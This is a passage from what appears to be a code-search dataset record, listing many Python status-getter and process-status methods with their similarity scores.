path.basename(self.process.args[0])\n try:\n with open(self.logfilename, newline='') as logfile:\n ts = datetime.fromtimestamp(path.getmtime(self.logfilename))\n status['cmdoutput'] = f\"Last output: {str(ts)[:-7]}\\n\"\n status['cmdoutput'] += '#'*80+'\\n'\n lines = logfile.readlines()\n if lines and lines[-1][-1] == '\\r':\n lines[-1] = lines[-1][:-1]\n for line in lines:\n if not line.endswith('\\r'):\n status['cmdoutput'] += line\n except FileNotFoundError:\n status['cmdoutput'] = \"\"\n \n # info for the lastimg to update\n status['lastimg'] = self.lastimgpath\n try:\n status['lastimg_timestamp'] = path.getmtime(self.lastimgpath)\n except FileNotFoundError:\n status['lastimg_timestamp'] = 0\n return status", "def get_status(self):\n if self.vm.get_cloud_status() != \"ACTIVE\":\n return \"stopped\"\n #wait for the vm to be ready and SSH-able\n self.vm.wait_ready()\n status = self.vm.run_command(\"ctool status\", indent=0, prefix='')\n return status.strip()", "def getStatus(self):\n return self.__status", "def status(self):\n\t\treturn self._status", "def get_status(self):\n return self._status", "def procs_running():\n \n return __proc_stat('procs_running')", "def mmo_what_process_am_i(self, mmo_connection):\n return mmo_connection[\"admin\"].command(\"serverStatus\")[\"process\"];", "def getStatus(self):\n return self._status", "def _get_status(self):\n return self.__status", "def status(self):\n try:\n res = subprocess.check_output([\n self.get_bin_path(\"pg_ctl\"), 'status', '-D', '{0}'.format(self.data_dir)\n ])\n return True\n except subprocess.CalledProcessError as e:\n if e.returncode == 3:\n # Not Running\n self.working = False\n return False\n elif e.returncode == 4:\n # No data or directory do not exists\n self.working = False\n return None", "def __call__(self):\n status = self.os.popen('circusctl status monitor').read().strip()\n\n if status == 'active':\n return True\n elif status == 'stopped':\n return False", "def status(self):\n self.scion_sh('status')", "def status(self):\r\n return self._status", "def status(self):\r\n return self._status", "def GetStatus(self):\r\n return self.status", "def getstatus(self):\n with self.lock:\n return (self.status, self.time_start)", "def 
pb_status(self):\n pb = ProcessingBlock(self._pb_id)\n return pb.status", "def status(self):\n return self.__status", "def status(self):\n return self.__status", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def get_status(self):\n try:\n c = self._oc_command([\"status\"])\n o = run_cmd(c, return_output=True)\n for line in o.split('\\n'):\n logger.debug(line)\n return o\n except subprocess.CalledProcessError as ex:\n raise ConuException(\"Cannot obtain OpenShift cluster status: %s\" % ex)", "def pr_status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"pr_status\")", "def get_status(self):\n return self.status", "def get_status(self):\n return self.status", "def get_status(self):\n return self.status", "def status(self):\n try:\n if not os.path.exists( self.pidfile ): raise Exception(\"pid not exist\")\n pid = int( file_content_get(self.pidfile).strip() )\n except Exception as e:\n pid = None\n\n if not pid:\n sys.stdout.write(\"%s is not running...\\n\"%self.name)\n else:\n sys.stdout.write(\"%s is running with pid %s...\\n\"%(self.name,pid) )\n\n \n return # not an error in a restart", "def status(self):\n return self.m.status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", 
"def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def getPidStatus(self, seg, pidRunningStatus):\n\n lockFileExists = pidRunningStatus['lockFileExists']\n netstatPortActive = pidRunningStatus['netstatPortActive']\n pidValue = pidRunningStatus['pidValue']\n\n lockFileName = gp.get_lockfile_name(seg.getSegmentPort())\n\n error = None\n if not lockFileExists and not netstatPortActive:\n error = \"No socket connection or lock file (%s) found for port %s\" % (lockFileName, seg.getSegmentPort())\n elif not lockFileExists and netstatPortActive:\n error = \"No lock file %s but process running on port %s\" % (lockFileName, seg.getSegmentPort())\n elif lockFileExists and not netstatPortActive:\n error = \"Have lock file %s but no process running on port %s\" % (lockFileName, seg.getSegmentPort())\n else:\n if pidValue == 0:\n error = \"Have lock file and process is active, but did not get a pid value\" # this could be an assert?\n\n res = {}\n res['pid'] = pidValue\n res['error'] = error\n return res", "def status(self):\n return self._get(path='status')", "def status(self):\n return self.get(self._names[\"status\"])", "def comando_status(self):\r\n\tif args.tipo == 'web':\r\n return self.status_web()\r\n\r\n\tif args.tipo == 'nfce':\r\n return self.consulta_status_nfce()\r\n\r\n\tif args.tipo == 'dual':\r\n return self.status_impressora_dual()", "def status(self):\n return self._query_status()['status']", "def status(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"status\")", "def getStatus(self):\n pid = self._getPid()\n if pid:\n if q.system.process.isPidAlive(pid):\n return AppStatusType.RUNNING\n return AppStatusType.HALTED", "def _CheckStatusWorkerProcess(self, pid):\n # TODO: Refactor this method, simplify and separate concerns (monitoring\n # vs management).\n self._RaiseIfNotRegistered(pid)\n\n process = self._processes_per_pid[pid]\n\n process_status = self._QueryProcessStatus(process)\n if process_status is None:\n process_is_alive = False\n else:\n process_is_alive = True\n\n process_information = self._process_information_per_pid[pid]\n used_memory = process_information.GetUsedMemory() or 0\n\n if self._worker_memory_limit and used_memory > self._worker_memory_limit:\n logger.warning((\n 'Process: {0:s} (PID: {1:d}) killed because it exceeded the '\n 'memory limit: {2:d}.').format(\n process.name, pid, self._worker_memory_limit))\n self._KillProcess(pid)\n\n if isinstance(process_status, dict):\n self._rpc_errors_per_pid[pid] = 0\n status_indicator = process_status.get('processing_status', None)\n\n else:\n rpc_errors = self._rpc_errors_per_pid.get(pid, 0) + 1\n self._rpc_errors_per_pid[pid] = rpc_errors\n\n if rpc_errors > self._MAXIMUM_RPC_ERRORS:\n process_is_alive = False\n\n if process_is_alive:\n rpc_port = process.rpc_port.value\n logger.warning((\n 'Unable to retrieve process: {0:s} (PID: {1:d}) status via '\n 'RPC socket: http://localhost:{2:d}').format(\n process.name, pid, rpc_port))\n\n processing_status_string = 'RPC error'\n status_indicator = definitions.STATUS_INDICATOR_RUNNING\n else:\n processing_status_string = 'killed'\n status_indicator = definitions.STATUS_INDICATOR_KILLED\n\n process_status = {\n 'processing_status': processing_status_string}\n\n self._UpdateProcessingStatus(pid, 
process_status, used_memory)\n\n # _UpdateProcessingStatus can also change the status of the worker,\n # So refresh the status if applicable.\n for worker_status in self._processing_status.workers_status:\n if worker_status.pid == pid:\n status_indicator = worker_status.status\n break\n\n if status_indicator in definitions.ERROR_STATUS_INDICATORS:\n logger.error((\n 'Process {0:s} (PID: {1:d}) is not functioning correctly. '\n 'Status code: {2!s}.').format(process.name, pid, status_indicator))\n\n self._TerminateProcessByPid(pid)\n\n replacement_process = None\n replacement_process_name = 'Worker_{0:02d}'.format(\n self._last_worker_number)\n for replacement_process_attempt in range(\n self._MAXIMUM_REPLACEMENT_RETRIES):\n logger.info((\n 'Attempt: {0:d} to start replacement worker process for '\n '{1:s}').format(replacement_process_attempt + 1, process.name))\n\n replacement_process = self._StartWorkerProcess(replacement_process_name)\n if replacement_process:\n break\n\n time.sleep(self._REPLACEMENT_WORKER_RETRY_DELAY)\n\n if not replacement_process:\n logger.error(\n 'Unable to create replacement worker process for: {0:s}'.format(\n process.name))", "def status(self):\n return self._data['status']", "def status(self):\n # process running ?\n pid = self.get_pidfile()\n \n running = True\n \n # process is not running\n if pid is None:\n running = False\n else:\n if not self.send_signal(pid,0):\n running = False\n # abnormal state, delete the file\n self.delete_pidfile()\n \n if running:\n message = \"server is running\\n\"\n else:\n message = \"server is not running\\n\"\n sys.stdout.write(message)\n \n return running", "def getStatus(self, pid = None):\n \n if pid == None:\n pid = self.getPidfile()\n \n if pid != None and q.system.process.isPidAlive(pid) == True and q.system.process.checkProcessForPid(int(pid), \"apache2\") == 0:\n return AppStatusType.RUNNING\n \n return AppStatusType.HALTED", "def status(self, *args):\n for k, v in self.processers.items():\n if v:\n if v.poll() is None:\n status = 'running'\n else:\n status = 'dead'\n else:\n status = 'stoped'\n print '%s - %s' % (k, status)", "def Status(self):\r\n\t\treturn self._get_attribute('status')", "def status(self):\n return self._dbattr('status')", "def status(self):\n\n return self._status", "def status(self):\n\n return self._status", "def status(self):\n\n return self._status", "def runtime_status(self):\n try:\n return self.yarn_api.state(self.app_id)\n except:\n return \"NONE\"" ]
[ "0.751286", "0.7507033", "0.71039456", "0.7082734", "0.70624167", "0.7023819", "0.69908047", "0.6980245", "0.69734716", "0.6922125", "0.69144756", "0.69109225", "0.6907264", "0.685191", "0.6851395", "0.68222255", "0.68154085", "0.68061125", "0.6799114", "0.6755627", "0.6755425", "0.6745426", "0.67345643", "0.6727798", "0.6727096", "0.6727096", "0.67269707", "0.6724537", "0.67141086", "0.67103297", "0.67103297", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.66993225", "0.6689249", "0.66866446", "0.66866446", "0.66866446", "0.66346246", "0.66290617", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66247857", "0.662288", "0.66166383", "0.66112256", "0.6607212", "0.66066587", "0.66066587", "0.66066587", "0.6589967", "0.6574808", "0.65610355", "0.6544279", "0.6530921", "0.65280676", "0.6525324", "0.65242916", "0.6522881", "0.6522881", "0.6522881", "0.65192354" ]
0.0
-1
Attempt to start the process
def sendStart (self, args) :
    data = streamModule.WriteBuffer()
    data.writeStruct('B', len(args))
    for arg in args :
        data.writeVarLen('B', arg)
    return self.sendCommand("CMD_IN_DO_START", data.getvalue()).addCallback(self._sendStart_result)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Start(self):\n\n\n\n assert not self._process, 'Start() can only be called once'\n self._process = subprocess.Popen(self._args)", "def start(self):\n self._proc = self._get_subprocess()\n self._pid = self._proc.pid\n self._return_code = None", "def start(self):\r\n return self.start_subprocess()", "def start_process(options, args):\n import psutil\n import process_starter\n from synergy.system import process_helper\n\n try:\n pid = process_helper.get_process_pid(options.app)\n if pid is not None:\n if psutil.pid_exists(pid):\n message = 'ERROR: Process %r is already running with pid %r\\n' % (options.app, pid)\n sys.stderr.write(message)\n sys.exit(1)\n\n if not options.interactive:\n # this block triggers if the options.interactive is not defined or is False\n process_helper.start_process(options.app, args)\n else:\n process_starter.start_by_process_name(options.app, args)\n except Exception as e:\n sys.stderr.write('Exception on starting %s : %s \\n' % (options.app, str(e)))\n traceback.print_exc(file=sys.stderr)", "def run(self):\n self.process.start()", "def reallyStartProcess(self, name):\n if name in self.protocols:\n return\n p = self.protocols[name] = DelayedStartupLoggingProtocol()\n p.service = self\n p.name = name\n procObj, env, uid, gid = self.processes[name]\n self.timeStarted[name] = time.time()\n\n childFDs = {0: \"w\", 1: \"r\", 2: \"r\"}\n\n childFDs.update(procObj.getFileDescriptors())\n\n procObj.starting()\n\n args = procObj.getCommandLine()\n\n self._reactor.spawnProcess(\n p, args[0], args, uid=uid, gid=gid, env=env,\n childFDs=childFDs\n )", "def start(self, process_id=None):\n try:\n self.process = psutil.Process(process_id)\n logging.debug(self.process.connections())\n logging.debug(self.process.ppid())\n return \"Process Started\"\n except Exception as e:\n logging.exception(e)\n return \"Process doesnt exists\"", "def start(self) -> None:\n JavaGate().exec_process_instance(\n self._user,\n self._project,\n self.name,\n \"\",\n self.worker_group,\n self.warning_type,\n self.warning_group_id,\n 24 * 3600,\n )", "def start(self):\n control_process = mp.Process(target = self._start, args = [])\n control_process.start()", "def start():\n global running\n # os.system('python3 /Users/bowenwaugh/Documents/GA/GA_Puzzles/simple.py')\n global process\n process = Popen(['python3', '/Users/bowenwaugh/Documents/GA/GA_Puzzles/simple.py'])\n running = True", "def start_process(self, args):\n try:\n with open(os.devnull, 'w') as devnull:\n popenObj = subprocess.Popen(\n args, stdout=devnull, stderr=subprocess.PIPE, cwd=\"/tmp/\")\n popenObj.name = args\n return popenObj\n except Exception as e:\n self.logger.error(\n \"Cannot start process %s due to reason:%s\", args, e)\n raise e", "def start(self):\n if self._is_launched.is_set():\n self._log(\"warning\", \"try to start an already started process\")\n return False\n\n self._popen = Popen(shlex.split(self.command), bufsize=0, executable=None, stdin=PIPE, stdout=PIPE,\n stderr=self.stderr, close_fds=False, shell=False, cwd=None, env=None,\n universal_newlines=True, startupinfo=None, creationflags=0,\n preexec_fn=lambda: os.nice(self._priority))\n\n self._defunctdog_thread.start()\n self._stdin_thread.start()\n self._stdout_thread.start()\n register_thread(self)\n self._is_launched.set()\n self._is_running.set()", "def start(self):\n # check for running server\n if self.running():\n return False\n\n # check for creation in the meantime\n file_name = os.path.join(self.cache_dir_, MGR_PID_FILE)\n if 
os.path.exists(file_name):\n return\n\n # launch child process\n f = open(file_name, 'w')\n self.server_pid_ = os.fork()\n if self.server_pid_ > 0: # parent process\n # create pid file\n f.write('%d\\n' %(self.server_pid_))\n else:\n time.sleep(MGR_SLEEP_TIME)\n if not self.running():\n logging.error('Server not started. PID file did not exist')\n raise ValueError()\n self.pid_ = self.server_pid_\n logging.info('Server started with pid %d' %(self.pid_))\n self.run()", "def test_startProcessAlreadyStarted(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n self.pm.startProcess(\"foo\")\r\n self.assertIdentical(None, self.pm.startProcess(\"foo\"))", "def start(self):\n cmd = self.doCommand(self.args)\n if cmd is not None:\n cmd.join()\n else:\n self.out = self.error", "def start_bot(self):\n self.proc = subprocess.Popen(\"./start\", stdin=subprocess.PIPE,\n\t\t\t\t\t\t\t\t\t stdout=subprocess.PIPE,\n\t\t\t\t\t\t\t\t\t cwd=os.path.abspath(self.path))", "def start_process(self, connection):\n\n self.handle_process(connection)", "def _StartWorkerProcess(self, process_name):", "def start(self):\n self.p.start()", "def do_start(self, str_arg):\n try:\n # self.adbc.startActivity(validateString(str_arg))\n # the above approach failed in unittest complaining device is offline, weird...\n return self.runAdbCmd('shell am start -n', validateString(str_arg))\n except RuntimeError:\n self.resultFlag = False\n if DEBUG:\n traceback.print_exc()", "def run_starter(self, expect_to_fail=False):\n logging.info(\"running starter \" + self.name)\n args = [self.cfg.bin_dir / \"arangodb\"] + self.hotbackup_args + self.default_starter_args + self.arguments\n\n lh.log_cmd(args)\n self.instance = psutil.Popen(args)\n logging.info(\"my starter has PID:\" + str(self.instance.pid))\n if not expect_to_fail:\n self.wait_for_logfile()\n self.wait_for_port_bind()", "def spawn(self):\r\n options = self.config.options\r\n\r\n if self.pid:\r\n msg = 'process %r already running' % self.config.name\r\n options.logger.warn(msg)\r\n return\r\n\r\n self.killing = 0\r\n self.spawnerr = None\r\n self.exitstatus = None\r\n self.system_stop = 0\r\n self.administrative_stop = 0\r\n\r\n self.laststart = time.time()\r\n\r\n self._assertInState(ProcessStates.EXITED, ProcessStates.FATAL,\r\n ProcessStates.BACKOFF, ProcessStates.STOPPED)\r\n\r\n self.change_state(ProcessStates.STARTING)\r\n\r\n try:\r\n filename, argv = self.get_execv_args()\r\n except ProcessException as what:\r\n self.record_spawnerr(what.args[0])\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n return\r\n\r\n try:\r\n self.dispatchers, self.pipes = self.config.make_dispatchers(self)\r\n except OSError as why:\r\n code = why.args[0]\r\n if code == errno.EMFILE:\r\n # too many file descriptors open\r\n msg = 'too many open files to spawn %r' % self.config.name\r\n else:\r\n msg = 'unknown error: %s' % errno.errorcode.get(code, code)\r\n self.record_spawnerr(msg)\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n return\r\n\r\n try:\r\n pid = options.fork()\r\n except OSError as why:\r\n code = why.args[0]\r\n if code == errno.EAGAIN:\r\n # process table full\r\n msg = ('Too many processes in process table to spawn %r' %\r\n self.config.name)\r\n else:\r\n msg = 'unknown error: %s' % errno.errorcode.get(code, code)\r\n\r\n self.record_spawnerr(msg)\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n 
options.close_parent_pipes(self.pipes)\r\n options.close_child_pipes(self.pipes)\r\n return\r\n\r\n if pid != 0:\r\n return self._spawn_as_parent(pid)\r\n\r\n else:\r\n return self._spawn_as_child(filename, argv)", "def start(self):\n if self.running:\n warnings.warn(\"ExifTool already running; doing nothing.\")\n return\n with open(os.devnull, \"w\") as devnull:\n procargs = [self.executable, \"-stay_open\", \"True\", \"-@\", \"-\",\n \"-common_args\", \"-G\", \"-n\"];\n procargs.extend(self.addedargs)\n logging.debug(procargs) \n self._process = subprocess.Popen(\n procargs,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=devnull)\n self.running = True", "def _start(self):\n if is_pidfile_stale(self.pidfile):\n self.pidfile.break_lock()\n\n try:\n self.daemon_context.open()\n except pidlockfile.AlreadyLocked:\n pidfile_path = self.pidfile.path\n raise DaemonRunnerStartFailureError(\n \"PID file %(pidfile_path)r already locked\" % vars())\n\n pid = os.getpid()\n message = self.start_message % vars()\n emit_message(message)\n\n self.app.run()", "def start():", "def start():", "def start():", "def start():", "def start_process(cmd, supress_output=False):\n logging.debug(cmd)\n logging.error(\"[tony]cmd:%r\" % (cmd))\n proc = subprocess.Popen(cmd, stdout=None, stderr=subprocess.PIPE)\n out, err = proc.communicate()\n rtn_code = proc.returncode\n\n if supress_output is False:\n if out:\n logging.info(out)\n if err:\n logging.error(err)\n\n if rtn_code == 0 or rtn_code is None:\n logging.info('Success: Process return code %s', str(rtn_code))\n else:\n logging.error('Error: Process return code %s', str(rtn_code))\n sys.exit(1)", "def start_process():\n global command, process\n\n def on_data(data):\n data = data.decode().strip()\n print('{}'.format(data))\n\n cmd = command.split(' ')\n\n if process:\n process.terminate()\n\n process = MySubprocess(cmd, -1, functools.partial(on_data), None, None)", "def _check_started(f):\n def inner(self, *args, **kwargs):\n if self._proc is None:\n raise ProcessIsNotStartedError('Call start() first to run the process.')\n return f(self, *args, **kwargs)\n\n return inner", "def start(self):\n if self.subcommand:\n os.execv(self.subcommand, [self.subcommand] + self.argv[1:])\n raise NoStart()\n \n if self.subapp:\n self.subapp.start()\n raise NoStart()\n \n if self.generate_config:\n self.write_default_config()\n raise NoStart()", "def start(self):\n if self._start is not None:\n raise ValueError, \"task %s already started\" % self._name\n self._start = 1\n self.run()", "def Spawn(proc):\n proc.start()\n return proc", "def start(self):\n self.__current_evaluation_context = self.agent.evaluation_context.create_child_context()\n self.current_evaluation_context.set_process(self)\n self.procedure.restart(self.__current_evaluation_context)\n self.__current_control_node = self.procedure.body\n self.__last_start_time = self.agent.evaluation_context.get_current_time()\n\n self._on_start()\n self.__state = Process.RUNNING", "def start(self):\r\n cfunc = lib_importer.windll.DAQmxStartTask\r\n if cfunc.argtypes is None:\r\n with cfunc.arglock:\r\n if cfunc.argtypes is None:\r\n cfunc.argtypes = [lib_importer.task_handle]\r\n\r\n error_code = cfunc(self._handle)\r\n check_for_error(error_code)", "def start():\n\n start_server()", "def start(self, *args):\n if args[0] == 'all':\n params = args[1:]\n for x in self.processers.keys():\n cmd = ['python', 'processmgr.py']\n cmd.append(x.replace('process', ''))\n cmd.extend(params)\n p = subprocess.Popen(cmd,\n 
stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n shell=False)\n self.processers[x] = p\n print 'run %s' % x\n else:\n cmd = ['python', 'processmgr.py']\n cmd.extend(args)\n p = subprocess.Popen(cmd,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n shell=False)\n \n self.processers['process%s' % args[0]] = p\n print 'run process%s.' % args[0]", "def start(self, reload_from=None):\n assert not self._process, \"server instance already started\"\n pid = Value(\"i\")\n self._process = Process(target=self._start,\n args=(pid, socket_queue),\n kwargs={\"reload_from\": reload_from})\n self._process.start()\n pid.value = self._process.pid", "def start():\n logging.info(\"Execution Started\")", "def start_procedure(self):\n pass", "def do_start(self,processor):\n # app_logger = self.construct_logger(rta_constants.PROPERTIES_LOG_FILE)\n running_dict = {}\n for item in self.get_running_status():\n running_dict[item.get('processor')]=item.get('status')\n\n if processor == 'spark':\n if running_dict:\n if running_dict['spark<spark_worker>'] != 'Running' and running_dict['spark<spark_master>'] != 'Running':\n try:\n cmd_line = self.cmd_start_spark\n cmd = subprocess.Popen([cmd_line],shell=True,stdout=subprocess.PIPE)\n (output,err) = cmd.communicate()\n # app_logger.info('*********output logging **************')\n print(output)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['spark<spark_worker>'] == 'Running' or running_dict['spark<spark_master>'] == 'Running':\n print('Spark Server is running!! please trying to stop it before it starts.')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n return\n\n elif processor == 'tomcat':\n if running_dict.has_key('tomcat') and running_dict['tomcat'] != 'Running':\n try:\n cmd_line = self.cmd_start_tomcat\n # print('staring tomcat server------->')\n print cmd_line\n\n # 2311 Vpl update to fix problem of catalina shutdown when term exit (10.x timeout)\n cmd = subprocess.call(['nohup',cmd_line,'start'])\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n #print(output)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('tomcat'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Tomcat Server is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'HDFS':\n #1/5/2017 Commit by JOJO\n '''\n if running_dict.has_key('HDFS') and running_dict['HDFS'] != 'Running':\n try:\n cmd_line = self.cmd_start_hadoop_hdfs\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n # print(output)\n # app_logger.info('*********output logging **************')\n # print(output)\n print('HDFS has been started!')\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('HDFS'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('HDFS server is running!! please trying to stop it before it start.')\n return\n '''\n print('Please type correct command! 
You may use \"help start\" see more help')\n return\n elif processor == 'web_management':\n if running_dict.has_key('web_management') and running_dict['web_management'] != 'Running':\n try:\n cmd_line = 'python '+self.cmd_start_web_management\n print('starting web_management webserver------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n (output,err) = cmd.communicate()\n print(output)\n # app_logger.info('*********output logging **************')\n # print(output)\n print('web_management webserver has been started!')\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('web_management'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Flask webserver is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'novelty':\n if running_dict.has_key('novelty') and running_dict['novelty'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running':\n try:\n cmd_line = self.cmd_start_novelty_detector\n # print('staring novelty------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n print('novelty has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('novelty'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['novelty'] == 'Running':\n print('novelty processor is running!! please trying to stop it before it start.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n\n elif processor == 'raw_writer':\n if running_dict.has_key('raw_writer') and running_dict['raw_writer'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running':\n try:\n cmd_line = self.cmd_start_raw_writer\n # print('staring raw_writer------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n print('raw_writer has been started!')\n return\n\n # app_logger.info('*********output logging **************')\n # print(output)\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('raw_writer'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['raw_writer'] == 'Running':\n print('raw_writer processor is running!! please trying to stop it before it start.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! 
trying to use command \"start spark\"')\n return\n\n elif processor == 'cassandra':\n if running_dict.has_key('cassandra') and running_dict['cassandra'] != 'Running':\n try:\n cmd_line = self.cmd_start_cassandra\n # print('starting cassandra------->')\n # print cmd_line\n\n #2311 Vpl update to fix problem of cassandra shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.call(['nohup',cmd_line])\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n # print(output)\n print ('cassandra has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('cassandra'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('cassandra Server is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'kairosDb':\n if running_dict.has_key('kairosDb') and running_dict['kairosDb'] != 'Running' and running_dict['cassandra']=='Running':\n try:\n cmd_line = self.cmd_start_kairosDB\n # print('staring kairosDB------->')\n\n # print cmd_line\n\t\t\t\t\t#2311 Vpl update to fix problem of kairosDb shutdown when term exit (10.x timeout)\n\t\t\t\t\t#cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.call(['nohup',cmd_line,'start'])\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n print('kairosDb has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('kairosDb'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['cassandra']=='Stopped':\n print('cassandra required starting before kairosDb is running!! please trying to \"start cassandra\" first')\n return\n elif running_dict['kairosDB'] == 'Running':\n print('kairosDB Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'grafana':\n if running_dict.has_key('grafana') and running_dict['grafana'] != 'Running' and running_dict['kairosDb']=='Running':\n try:\n cmd_line = self.cmd_start_grafana\n # print('staring grafana------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n # app_logger.info('*********output logging **************')\n # print(output)\n print ('grafana has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('grafana'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['kairosDb']=='Stopped':\n print('kairosDb required starting before grafana is running!! please trying to \"start kairoseDb\" first')\n return\n elif running_dict['grafana'] == 'Running':\n print('grafana Server is running!! 
